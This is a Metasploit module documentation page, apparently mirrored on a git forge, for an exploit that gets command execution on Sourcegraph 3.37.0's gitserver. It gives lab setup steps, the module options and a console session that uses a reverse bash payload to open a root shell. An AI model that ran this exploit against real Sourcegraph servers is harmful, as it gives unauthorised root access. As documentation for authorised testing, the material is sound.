adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
27ad62c96421014d0dc42bd6b145269eb09c47c0
metasploit-gs/documentation/modules/exploit/linux/http/sourcegraph_gitserver_sshcmd.md
T
Spencer McIntyre 27ad62c964 Add a decent check method
2022-07-08 16:40:42 -04:00

2.8 KiB
Raw Blame History

Vulnerable Application

lorem ip sum blah blah

Verification Steps

  1. Install the application
    1. Install and run it through docker
docker run \
  --publish 3178:3178 \
  --publish 7080:7080 \
  --publish 127.0.0.1:3370:3370 \
  --rm \
  --volume ~/.sourcegraph/config:/etc/sourcegraph \
  --volume ~/.sourcegraph/data:/var/opt/sourcegraph \
  sourcegraph/server:3.37.0

  1. Configure a cloned repo, use a github access token

  2. Start msfconsole

  3. Do: use [module path]

  4. Set the options

  5. Do: run

  6. You should get a shell.

Options

List each option and how to use it.

EXISTING_REPO

An existing cloned repo on the server. If none is specified, one will be automatically determined.

Scenarios

SourceGraph v3.37.0 running on Docker

msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > show options

Module options (exploit/linux/http/sourcegraph_gitserver_sshcmd):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   EXISTING_REPO                   no        An existing, cloned repository
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS         192.168.159.128  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          3178             yes       The target port (TCP)
   SRVHOST        0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT        8080             yes       The local port to listen on.
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                         no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI      /                yes       Base path
   URIPATH                         no        The URI to use for this exploit (default is random)
   VHOST                           no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Using automatically identified repository: github.com/zerosteiner/gh-sandbox
[*] Executing Unix Command target

id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
Reference in New Issue View Git Blame Copy Permalink